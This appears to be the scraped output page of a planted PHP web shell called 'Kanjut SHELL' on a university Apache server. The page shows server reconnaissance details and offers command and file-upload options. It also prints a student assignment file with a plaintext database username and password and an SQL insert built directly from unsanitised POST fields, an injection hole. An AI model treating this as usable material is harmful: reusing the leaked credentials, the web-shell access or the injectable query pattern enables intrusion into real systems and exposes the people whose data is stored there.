Kanjut SHELL
Server IP : 172.16.15.8  /  Your IP : 18.222.56.251
Web Server : Apache
System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.2.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/ranicholson/public_html/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/ranicholson/public_html/assignment11.php
<!-- File name: assignment11.php -->

<Center>
<H1>
Course Evaluation Table
</H1>
<HR>
<?php
	$status = $_POST['status'];
	$course  = $_POST['course'];
	$eval = $_POST['eval'];

	$host = 'localhost';
	$user = 'ranicholson';
	$passwd = 'cs480';
	$database = 'ranicholson';
	$connect = mysqli_connect($host, $user, $passwd);
	$query = "insert into EVAL values 
			('$status', '$course', '$eval')";
	mysqli_select_db($connect, $database);
	if(mysqli_query($connect, $query))
		print "<P>Insert successful.<P>";
	else
		print "<P>Insert fail.<p>";
	mysqli_close($connect);
	include ("a11display.php");
?>
<P>
<Font color=red  size=4.5> Click the link below to fill out and insert a Course Evaluation Form to the Course Evaluation Table.
</font>
<P>
<A HREF=assignment11.html><Font size=4> Fill out Course Evaluation Form </A>
<P>
<P>
<Font color=red  size=4.5> Click the link below to go back to the Home Page.
</font>
<P>
<A HREF=a11pg1.html><Font size=4> Home Page </A>

</Center>

Stv3n404 - 2023